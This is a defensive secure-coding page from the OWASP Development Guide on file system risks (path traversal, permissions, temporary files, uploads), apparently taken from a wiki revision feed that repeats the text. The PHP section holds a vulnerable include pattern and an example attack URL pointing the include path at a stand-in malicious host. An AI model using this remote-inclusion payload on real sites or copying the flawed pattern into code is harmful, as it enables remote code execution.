* Does the application use file system calls or executes system commands (such as exec() or xp_cmdshell()? &lt;br /&gt;
&lt;br /&gt;
* Would any of execution or file system calls allow the execution of additional, unauthorized commands? See the OS Injection section for more details.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure or recommend that the underlying operating system and web application environment are kept up to date&lt;br /&gt;
&lt;br /&gt;
* Ensure the application files and resources are read-only&lt;br /&gt;
&lt;br /&gt;
* Ensure the application does not take user supplied file names when saving or working on local files&lt;br /&gt;
&lt;br /&gt;
* Ensure the application properly checks all user supplied input to prevent additional commands cannot be run&lt;br /&gt;
&lt;br /&gt;
==Path traversal  ==&lt;br /&gt;
&lt;br /&gt;
All but the most simple web applications have to include local resources, such as images, themes, other scripts, and so on. Every time a resource or file is included by the application, there is a risk that an attacker may be able to include a file or remote resource you didn’t authorize. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect code containing file open, include, file create, file delete, and so on&lt;br /&gt;
&lt;br /&gt;
* Determine if it contains unsanitized user input. &lt;br /&gt;
&lt;br /&gt;
* If so, the application is likely to be at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Prefer working without user input when using file system calls&lt;br /&gt;
&lt;br /&gt;
* Use indexes rather than actual portions of file names when templating or using language files (ie value 5 from the user submission = Czechoslovakian, rather than expecting the user to return “Czechoslovakian”)&lt;br /&gt;
&lt;br /&gt;
* Ensure the user cannot supply all parts of the path – surround it with your path code&lt;br /&gt;
&lt;br /&gt;
* Validate the user’s input by only accepting known good – do not sanitize the data&lt;br /&gt;
&lt;br /&gt;
* Use chrooted jails and code access policies to restrict where the files can be obtained or saved to&lt;br /&gt;
&lt;br /&gt;
See the OWASP article on [[Path Traversal]] for a description of the attack.&lt;br /&gt;
&lt;br /&gt;
==Insecure permissions ==&lt;br /&gt;
&lt;br /&gt;
Many developers take short cuts to get their applications to work, and often many system administrators do not fully understand the risks of permissive file system ACLs&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Can other local users on the system read, modify, or delete files used by the web application?&lt;br /&gt;
&lt;br /&gt;
If so, it is highly likely that the application is vulnerable to local and remote attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use the tighest possible permissions when developing and deploying web applications&lt;br /&gt;
&lt;br /&gt;
* Many web applications can be deployed on read-only media, such as CD-ROMs &lt;br /&gt;
&lt;br /&gt;
* Consider using chroot jails and code access security policies to restrict and control the location and type of file operations even if the system is misconfigured&lt;br /&gt;
&lt;br /&gt;
* Remove all “Everyone:Full Control” ACLs on Windows, and all mode 777 (world writeable directories) or mode 666 files (world writeable files) on Unix systems&lt;br /&gt;
&lt;br /&gt;
* Strongly consider removing “Guest”, “everyone,” and world readable permissions wherever possible&lt;br /&gt;
&lt;br /&gt;
==Insecure Indexing ==&lt;br /&gt;
&lt;br /&gt;
A very popular tool is the Google desktop search engine and Spotlight on the Macintosh. These wonderful tools allow users to easily find anything on their hard drives. This same wonderful technology allows remote attackers to determine exactly what you have hidden away deep in your application’s guts. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use Google and a range of other search engines to find something on your web site, such as a meta tag or a hidden file&lt;br /&gt;
&lt;br /&gt;
* If a file is found, your application is at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use robots.txt – this will prevent most search engines looking any further than what you have in mind&lt;br /&gt;
&lt;br /&gt;
* Tightly control the activities of any search engine you run for your site, such as the IIS Search Engine, Sharepoint, Google appliance, and so on. &lt;br /&gt;
&lt;br /&gt;
* If you don’t need an searchable index to your web site, disable any search functionality which may be enabled.&lt;br /&gt;
&lt;br /&gt;
==Unmapped files ==&lt;br /&gt;
&lt;br /&gt;
Web application frameworks will interpret only their own files to the user, and render all other content as HTML or as plain text. This may disclose secrets and configuration which an attacker may be able to use to successfully attack the application.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Upload a file that is not normally visible, such as a configuration file such as config.xml or similar, and request it using a web browser. If the file’s contents are rendered or exposed, then the application is at risk. &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Remove or move all files that do not belong in the web root.&lt;br /&gt;
&lt;br /&gt;
* Rename include files to be normal extension (such as foo.inc ? foo.jsp or foo.aspx).&lt;br /&gt;
&lt;br /&gt;
* Map all files that need to remain, such as .xml or .cfg to an error handler or a renderer that will not disclose the file contents. This may need to be done in both the web application framework’s configuration area or the web server’s configuration.&lt;br /&gt;
&lt;br /&gt;
==Temporary files ==&lt;br /&gt;
&lt;br /&gt;
Applications occasionally need to write results or reports to disk. Temporary files, if exposed to unauthorized users, may expose private and confidential information, or allow an attacker to become an authorized user depending on the level of vulnerability.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Determine if your application uses temporary files. If it does, check the following:&lt;br /&gt;
&lt;br /&gt;
* Are the files within the web root? If so, can they be retrieved using just a browser? If so, can the files be retrieved without being logged on? &lt;br /&gt;
&lt;br /&gt;
* Are old files exposed? Is there a garbage collector or other mechanism deleting old files?&lt;br /&gt;
&lt;br /&gt;
* Does retrieval of the files expose the application’s workings, or expose private data?&lt;br /&gt;
&lt;br /&gt;
The level of vulnerability is derived from the asset classification assigned to the data.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Temporary file usage is not always important to protect from unauthorized access. For medium to high-risk usage, particularly if the files expose the inner workings of your application or exposes private user data, the following controls should be considered:&lt;br /&gt;
&lt;br /&gt;
* The temporary file routines could be re-written to generate the content on the fly rather than storing on the file system.&lt;br /&gt;
&lt;br /&gt;
* Ensure that all resources are not retrievable by unauthenticated users, and that users are authorized to retrieve only their own files.&lt;br /&gt;
&lt;br /&gt;
* Use a “garbage collector” to delete old temporary files, either at the end of a session or within a timeout period, such as 20 minutes.&lt;br /&gt;
&lt;br /&gt;
* If deployed under Unix-like operating systems, use chroot jails to isolate the application from the primary operating system. On Windows, use the inbuilt ACL support to prevent the IIS users from retrieving or overwriting the files directly.&lt;br /&gt;
&lt;br /&gt;
* Move the files to outside the web root to prevent browser-only attacks.&lt;br /&gt;
&lt;br /&gt;
* Use random file names to decrease the likelihood of a brute force pharming attack.&lt;br /&gt;
&lt;br /&gt;
==PHP ==&lt;br /&gt;
&lt;br /&gt;
==Includes and Remote files  ==&lt;br /&gt;
&lt;br /&gt;
The PHP functions include() and require() provide an easy way of including and evaluating files. When a file is included, the code it contains inherits the variable scope of the line on which the include statement was executed. All variables available at that line will be available within the included file. And the other way around, variables defined in the included file will be available to the calling page within the current scope. The included file does not have to be a file on the local computer. If the allow_url_fopen directive is enabled in php.ini you can specify the file to be included using an URL. &lt;br /&gt;
&lt;br /&gt;
PHP will get it via HTTP instead of a local pathname. While this is a nice feature it can also be a big security risk. &lt;br /&gt;
&lt;br /&gt;
'''Note: The allow_url_fopen directive is enabled by default. '''&lt;br /&gt;
&lt;br /&gt;
A common mistake is not considering that every file can be called directly, that is a file written to be included is called directly by a malicious user. An example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php');&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In the above example, functions.php is not meant to be called directly, so it assumes the calling page sets $sIncludePath. By creating a file called datetime.php or filesystem.php on another server (and turning off PHP processing on that server) we could call functions.php like the following:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
functions.php?sIncludePath=http://www.malicioushost.com/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
PHP would nicely download datetime.php from the other server and execute it, which means a malicious user could execute code of his/her choice in functions.php. I would recommend against includes within includes (as the example above). In my opinion, it makes it harder to understand and get an overview of the code. Right now, we want to make the above code safe and to do that we make sure that functions.php really is called from file.php. The code below shows one solution: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
define('SECURITY_CHECK', true);&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'functions.php'); &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
// functions.php&lt;br /&gt;
&lt;br /&gt;
if ( !defined('SECURITY_CHECK') ) {&lt;br /&gt;
&lt;br /&gt;
// Output error message and exit. 	   &lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'datetime.php');&lt;br /&gt;
&lt;br /&gt;
include($sIncludePath . 'filesystem.php'); 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The function define() defines a constant. Constants are not prefixed by a dollar sign ($) and thus we cannot break this by something like: functions.php?SECURITY_CHECK=1. Although not so common these days, you can still come across PHP files with the .inc extension. These files are only meant to be included by other files. What is often overlooked is that these files, if called directly, do not go through the PHP preprocessor, and thus are sent in clear text. We should be consistent and stick with one extension that we know is processed by PHP. The .php extension is recommended.&lt;br /&gt;
&lt;br /&gt;
==File upload  ==&lt;br /&gt;
&lt;br /&gt;
PHP is a feature rich language and one of its built in features is automatic handling of file uploads. When a file is uploaded to a PHP page, it is automatically saved to a temporary directory. New global variables describing the uploaded file will be available within the page. Consider the following HTML code presenting a user with an upload form: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;form action= “page.php “ method= “POST “ enctype= “multipart/form-data “&amp;gt; 	  &amp;lt;input type= “file “ name= “testfile “ /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;input type= “submit “ value= “Upload file “ /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/form&amp;gt; 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After submitting the above form, new variables will be available to page.php based on the “testfile” name. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
// Variables set by PHP and what they will contain: &lt;br /&gt;
&lt;br /&gt;
// A temporary path/filename generated by PHP. This is where the file is&lt;br /&gt;
&lt;br /&gt;
// saved until we move it or it is removed by PHP if we choose not to do anything with it. &lt;br /&gt;
&lt;br /&gt;
$testfile &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system. &lt;br /&gt;
&lt;br /&gt;
$testfile_name&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_size &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. For example:  “image/jpeg”. 	&lt;br /&gt;
&lt;br /&gt;
$testfile_type 	  &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A common approach is to check if $testfile is set and if it is, start working on it right away, maybe copying it to a public directory, accessible from any browser. You probably already guessed it; this is a very insecure way of working with uploaded files. The $testfile variable does not have to be a path/file to an uploaded file. It could come from GET, POST, and COOKIE etc. A malicious user could make us work on any file on the server, which is not very pleasant. We should not assume anything about the register_globals directive, it could be on or off for all we care, our code should work with or without it and most importantly it will be just as secure regardless of configuration settings. So the first thing we should do is to use the $_FILES array:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// The temporary filename generated by PHP &lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['tmp_name'] &lt;br /&gt;
&lt;br /&gt;
// The original name/path of the file on the client's system. $_FILES['testfile']['name'] &lt;br /&gt;
&lt;br /&gt;
// The mime type of the file if the browser provided this information. &lt;br /&gt;
&lt;br /&gt;
// For example:  “image/jpeg “. 	&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['type']&lt;br /&gt;
&lt;br /&gt;
// The size of the uploaded file in bytes.&lt;br /&gt;
&lt;br /&gt;
$_FILES['testfile']['size'] 	 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The built in functions is_uploaded_file() and/or move_uploaded_file() should be called with $_FILES['testfile']['tmp_name'] to make sure that the file really was uploaded by HTTP POST. The following example shows a straightforward way of working with uploaded files: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
if ( is_uploaded_file($_FILES['testfile']['tmp_name']) ) {&lt;br /&gt;
&lt;br /&gt;
// Check if the file size is what we expect (optional) &lt;br /&gt;
&lt;br /&gt;
if ( $_FILES['sImageData']['size'] &amp;gt; 102400 ) {&lt;br /&gt;
&lt;br /&gt;
// The size can not be over 100kB, output error message and exit. 	        ...&lt;br /&gt;
&lt;br /&gt;
}    &lt;br /&gt;
&lt;br /&gt;
// Validate the file name and extension based on the original name in $_FILES['testfile']['name'], &lt;br /&gt;
&lt;br /&gt;
// we do not want anyone to be able to upload .php files for example. 	   ...&lt;br /&gt;
&lt;br /&gt;
// Everything is okay so far, move the file with move_uploaded_file 	  &lt;br /&gt;
&lt;br /&gt;
... &lt;br /&gt;
&lt;br /&gt;
} 	&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Note: We should always check if a variable in the superglobals arrays is set with isset() before accessing it. I choose not to do that in the above examples because I wanted to keep them as simple as possible.&lt;br /&gt;
&lt;br /&gt;
==Old, unreferenced files ==&lt;br /&gt;
&lt;br /&gt;
It is common for system administrators and developers to use editors and other tools which create temporary old files. If the file extensions or access control permissions change, an attacker may be able to read source or configuration data.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Check the file system for:&lt;br /&gt;
&lt;br /&gt;
* Temporary files (such as core, ~foo, blah.tmp, and so on) created by editors or crashed programs&lt;br /&gt;
&lt;br /&gt;
* Folders called “backup” “old” or “Copy of …”&lt;br /&gt;
&lt;br /&gt;
* Files with additional extensions, such as foo.php.old&lt;br /&gt;
&lt;br /&gt;
* Temporary folders with intermediate results or cache templates&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use source code control to prevent the need to keep old copies of files around&lt;br /&gt;
&lt;br /&gt;
* Periodically ensure that all files in the web root are actually required&lt;br /&gt;
&lt;br /&gt;
* Ensure that the application’s temporary files are not accessible from the web root&lt;br /&gt;
&lt;br /&gt;
==Second Order Injection ==&lt;br /&gt;
&lt;br /&gt;
If the web application creates a file that is operated on by another process, typically a batch or scheduled process, the second process may be vulnerable to attack. It is a rare application that ensures input to background processes is validated prior to first use.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Does the application use background / batch / scheduled processes to work on user supplied data?&lt;br /&gt;
&lt;br /&gt;
* Does this program validate the user input prior to operating on it?&lt;br /&gt;
&lt;br /&gt;
* Does this program communicate with other business significant processes or otherwise approve transactions? &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure that all behind the scenes programs check user input prior to operating on it&lt;br /&gt;
&lt;br /&gt;
* Run the application with the least privilege – in particular, the batch application should not require write privileges to any front end files, the network, or similar&lt;br /&gt;
&lt;br /&gt;
* Use inbuilt language or operating system features to curtail the resources and features which the background application may use. For example, batch programs rarely if ever require network access. &lt;br /&gt;
&lt;br /&gt;
* Consider the use of host based intrusion detection systems and anti-virus systems to detect unauthorized file creation. &lt;br /&gt;
&lt;br /&gt;
==Further Reading ==&lt;br /&gt;
&lt;br /&gt;
* Klein, A., ''Insecure Indexing''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.webappsec.org/projects/articles/022805-clean.html&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* MySQL world readable log files&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://www.securityfocus.com/advisories/3803&amp;lt;/u&amp;gt; &lt;br /&gt;
&lt;br /&gt;
* Oracle 8i and 9i Servlet allows remote file viewing&lt;br /&gt;
&lt;br /&gt;
&amp;lt;u&amp;gt;http://online.securityfocus.com/advisories/3964&amp;lt;/u&amp;gt;  &lt;br /&gt;
&lt;br /&gt;
==File System ==&lt;br /&gt;
&lt;br /&gt;
Even with an authentication system in place to protect your content, if file permissions are set incorrectly an attacker could browse directly to your application source code or protected documents.  The section below gives guidance in setting file system permissions and directories to reduce your risk of exposure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Best Practice'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Permissions'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Restrict access of the \CFIDE directory to specific IP address and user group/account.&lt;br /&gt;
&lt;br /&gt;
Remove the \cfdocs directory. Sample applications are installed by default in the cfdocs directory and are accessible to anyone. These applications should never be available on a production server.&lt;br /&gt;
&lt;br /&gt;
Ensure that directory browsing is disabled.&lt;br /&gt;
&lt;br /&gt;
Ensure that proper access controls are set on web application content. The following settings assume a user account called “cfuser” has been created to run the ColdFusion service.  In addition, if you are using a directory or operating system authentication service these setting may need to be adjusted.  &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Scripts (.cfm, .cfml, .cfc, .jsp, and others)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Execute); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
File types: Static content (.txt, .gif, .jpg, .html, .xml)&lt;br /&gt;
&lt;br /&gt;
'''ACLs: cfuser (Read); Administrators (Full)'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''File Upload'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Upload files to a destination outside of the web application directory.&lt;br /&gt;
&lt;br /&gt;
Enable virus scan on the destination directory.&lt;br /&gt;
&lt;br /&gt;
Do not allow user input to specify the destination directory or file name of uploaded documents.&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
[[Guide Table of Contents|Development Guide Table of Contents]]&lt;br /&gt;
[[Category:OWASP_Guide_Project]]&lt;br /&gt;
[[Category:File System]]&lt;/div&gt;</summary>
		<author><name>KirstenS</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File_System&amp;diff=59851</id>
		<title>File System</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File_System&amp;diff=59851"/>
				<updated>2009-05-02T11:33:18Z</updated>
		
		<summary type="html">&lt;p&gt;KirstenS: /* Includes and Remote files */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Guide Table of Contents|Development Guide Table of Contents]]__TOC__&lt;br /&gt;
&lt;br /&gt;
==Objective ==&lt;br /&gt;
&lt;br /&gt;
To ensure that access to the local file system of any of the systems is protected from unauthorized creation, modification, or deletion.&lt;br /&gt;
&lt;br /&gt;
==Environments Affected ==&lt;br /&gt;
&lt;br /&gt;
All. &lt;br /&gt;
&lt;br /&gt;
==Relevant COBIT Topics ==&lt;br /&gt;
&lt;br /&gt;
DS11 – Manage Data – All sections should be reviewed&lt;br /&gt;
&lt;br /&gt;
DS11.9 – Data processing integrity&lt;br /&gt;
&lt;br /&gt;
DS11.20 – Continued integrity of stored data&lt;br /&gt;
&lt;br /&gt;
==Description ==&lt;br /&gt;
&lt;br /&gt;
The file system is a fertile ground for average attackers and script kiddies alike. Attacks can be devastating for the average site, and they are often some of the easiest attacks to perform. &lt;br /&gt;
&lt;br /&gt;
==Best Practices ==&lt;br /&gt;
&lt;br /&gt;
* Use “chroot” jails on Unix platforms&lt;br /&gt;
&lt;br /&gt;
* Use minimal file system permissions on all platforms&lt;br /&gt;
&lt;br /&gt;
* Consider the use of read-only file systems (such as CD-ROM or locked USB key) if practical&lt;br /&gt;
&lt;br /&gt;
==Defacement ==&lt;br /&gt;
&lt;br /&gt;
Defacement is one of the most common attacks against web sites. An attacker uses a tool or technique to upload hostile content over the top of existing files or via configuration mistakes, new files. Defacement can be acutely embarrassing, resulting in reputation loss and loss of trust with users. &lt;br /&gt;
&lt;br /&gt;
There are many defacement archives on the Internet, and most defacements occur due to poor patching of vulnerable web servers, but the next most common form of defacement occurs due to web application vulnerabilities. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Is your system up to date? &lt;br /&gt;
&lt;br /&gt;
* Does the file system allow writing via the web user to the web content (including directories?)&lt;br /&gt;
&lt;br /&gt;
* Does the application write files with user supplied file names?&lt;br /&gt;
&lt;br /&gt;
* Does the application use file system calls or executes system commands (such as exec() or xp_cmdshell()? &lt;br /&gt;
&lt;br /&gt;
* Would any of execution or file system calls allow the execution of additional, unauthorized commands? See the OS Injection section for more details.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Ensure or recommend that the underlying operating system and web application environment are kept up to date&lt;br /&gt;
&lt;br /&gt;
* Ensure the application files and resources are read-only&lt;br /&gt;
&lt;br /&gt;
* Ensure the application does not take user supplied file names when saving or working on local files&lt;br /&gt;
&lt;br /&gt;
* Ensure the application properly checks all user supplied input to prevent additional commands cannot be run&lt;br /&gt;
&lt;br /&gt;
==Path traversal  ==&lt;br /&gt;
&lt;br /&gt;
All but the most simple web applications have to include local resources, such as images, themes, other scripts, and so on. Every time a resource or file is included by the application, there is a risk that an attacker may be able to include a file or remote resource you didn’t authorize. &lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Inspect code containing file open, include, file create, file delete, and so on&lt;br /&gt;
&lt;br /&gt;
* Determine if it contains unsanitized user input. &lt;br /&gt;
&lt;br /&gt;
* If so, the application is likely to be at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Prefer working without user input when using file system calls&lt;br /&gt;
&lt;br /&gt;
* Use indexes rather than actual portions of file names when templating or using language files (ie value 5 from the user submission = Czechoslovakian, rather than expecting the user to return “Czechoslovakian”)&lt;br /&gt;
&lt;br /&gt;
* Ensure the user cannot supply all parts of the path – surround it with your path code&lt;br /&gt;
&lt;br /&gt;
* Validate the user’s input by only accepting known good – do not sanitize the data&lt;br /&gt;
&lt;br /&gt;
* Use chrooted jails and code access policies to restrict where the files can be obtained or saved to&lt;br /&gt;
&lt;br /&gt;
See the OWASP article on [[Path Traversal]] for a description of the attack.&lt;br /&gt;
&lt;br /&gt;
==Insecure permissions ==&lt;br /&gt;
&lt;br /&gt;
Many developers take short cuts to get their applications to work, and often many system administrators do not fully understand the risks of permissive file system ACLs&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Can other local users on the system read, modify, or delete files used by the web application?&lt;br /&gt;
&lt;br /&gt;
If so, it is highly likely that the application is vulnerable to local and remote attack.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use the tighest possible permissions when developing and deploying web applications&lt;br /&gt;
&lt;br /&gt;
* Many web applications can be deployed on read-only media, such as CD-ROMs &lt;br /&gt;
&lt;br /&gt;
* Consider using chroot jails and code access security policies to restrict and control the location and type of file operations even if the system is misconfigured&lt;br /&gt;
&lt;br /&gt;
* Remove all “Everyone:Full Control” ACLs on Windows, and all mode 777 (world writeable directories) or mode 666 files (world writeable files) on Unix systems&lt;br /&gt;
&lt;br /&gt;
* Strongly consider removing “Guest”, “everyone,” and world readable permissions wherever possible&lt;br /&gt;
&lt;br /&gt;
==Insecure Indexing ==&lt;br /&gt;
&lt;br /&gt;
A very popular tool is the Google desktop search engine and Spotlight on the Macintosh. These wonderful tools allow users to easily find anything on their hard drives. This same wonderful technology allows remote attackers to determine exactly what you have hidden away deep in your application’s guts. &lt;br /&gt;
&lt;br /&gt;
===How to determine if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
* Use Google and a range of other search engines to find something on your web site, such as a meta tag or a hidden file&lt;br /&gt;
&lt;br /&gt;
* If a file is found, your application is at risk.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Use robots.txt – this will prevent most search engines looking any further than what you have in mind&lt;br /&gt;
&lt;br /&gt;
* Tightly control the activities of any search engine you run for your site, such as the IIS Search Engine, Sharepoint, Google appliance, and so on. &lt;br /&gt;
&lt;br /&gt;
* If you don’t need an searchable index to your web site, disable any search functionality which may be enabled.&lt;br /&gt;
&lt;br /&gt;
==Unmapped files ==&lt;br /&gt;
&lt;br /&gt;
Web application frameworks will interpret only their own files to the user, and render all other content as HTML or as plain text. This may disclose secrets and configuration which an attacker may be able to use to successfully attack the application.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Upload a file that is not normally visible, such as a configuration file such as config.xml or similar, and request it using a web browser. If the file’s contents are rendered or exposed, then the application is at risk. &lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
* Remove or move all files that do not belong in the web root.&lt;br /&gt;
&lt;br /&gt;
* Rename include files to be normal extension (such as foo.inc ? foo.jsp or foo.aspx).&lt;br /&gt;
&lt;br /&gt;
* Map all files that need to remain, such as .xml or .cfg to an error handler or a renderer that will not disclose the file contents. This may need to be done in both the web application framework’s configuration area or the web server’s configuration.&lt;br /&gt;
&lt;br /&gt;
==Temporary files ==&lt;br /&gt;
&lt;br /&gt;
Applications occasionally need to write results or reports to disk. Temporary files, if exposed to unauthorized users, may expose private and confidential information, or allow an attacker to become an authorized user depending on the level of vulnerability.&lt;br /&gt;
&lt;br /&gt;
===How to identify if you are vulnerable ===&lt;br /&gt;
&lt;br /&gt;
Determine if your application uses temporary files. If it does, check the following:&lt;br /&gt;
&lt;br /&gt;
* Are the files within the web root? If so, can they be retrieved using just a browser? If so, can the files be retrieved without being logged on? &lt;br /&gt;
&lt;br /&gt;
* Are old files exposed? Is there a garbage collector or other mechanism deleting old files?&lt;br /&gt;
&lt;br /&gt;
* Does retrieval of the files expose the application’s workings, or expose private data?&lt;br /&gt;
&lt;br /&gt;
The level of vulnerability is derived from the asset classification assigned to the data.&lt;br /&gt;
&lt;br /&gt;
===How to protect yourself ===&lt;br /&gt;
&lt;br /&gt;
Temporary file usage is not always important to protect from unauthorized access. For medium to high-risk usage, particularly if the files expose the inner workings of your application or exposes private user data, the following controls should be considered:&lt;br /&gt;
&lt;br /&gt;
* The temporary file routines could be re-written to generate the content on the fly rather than storing on the file system.&lt;br /&gt;
&lt;br /&gt;
* Ensure that all resources are not retrievable by unauthenticated users, and that users are authorized to retrieve only their own files.&lt;br /&gt;
&lt;br /&gt;
* Use a “garbage collector” to delete old temporary files, either at the end of a session or within a timeout period, such as 20 minutes.&lt;br /&gt;
&lt;br /&gt;
* If deployed under Unix-like operating systems, use chroot jails to isolate the application from the primary operating system. On Windows, use the inbuilt ACL support to prevent the IIS users from retrieving or overwriting the files directly.&lt;br /&gt;
&lt;br /&gt;
* Move the files to outside the web root to prevent browser-only attacks.&lt;br /&gt;
&lt;br /&gt;
* Use random file names to decrease the likelihood of a brute force pharming attack.&lt;br /&gt;
&lt;br /&gt;
==PHP ==&lt;br /&gt;
&lt;br /&gt;
==Includes and Remote files  ==&lt;br /&gt;
&lt;br /&gt;
The PHP functions include() and require() provide an easy way of including and evaluating files. When a file is included, the code it contains inherits the variable scope of the line on which the include statement was executed. All variables available at that line will be available within the included file. And the other way around, variables defined in the included file will be available to the calling page within the current scope. The included file does not have to be a file on the local computer. If the allow_url_fopen directive is enabled in php.ini you can specify the file to be included using an URL. &lt;br /&gt;
&lt;br /&gt;
PHP will get it via HTTP instead of a local pathname. While this is a nice feature it can also be a big security risk. &lt;br /&gt;
&lt;br /&gt;
'''Note: The allow_url_fopen directive is enabled by default. '''&lt;br /&gt;
&lt;br /&gt;
A common mistake is not considering that every file can be called directly, that is a file written to be included is called directly by a malicious user. An example: &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
// file.php&lt;br /&gt;
&lt;br /&gt;
$sIncludePath = '/inc/'; &lt;br /&gt;
&lt;br /&gt;
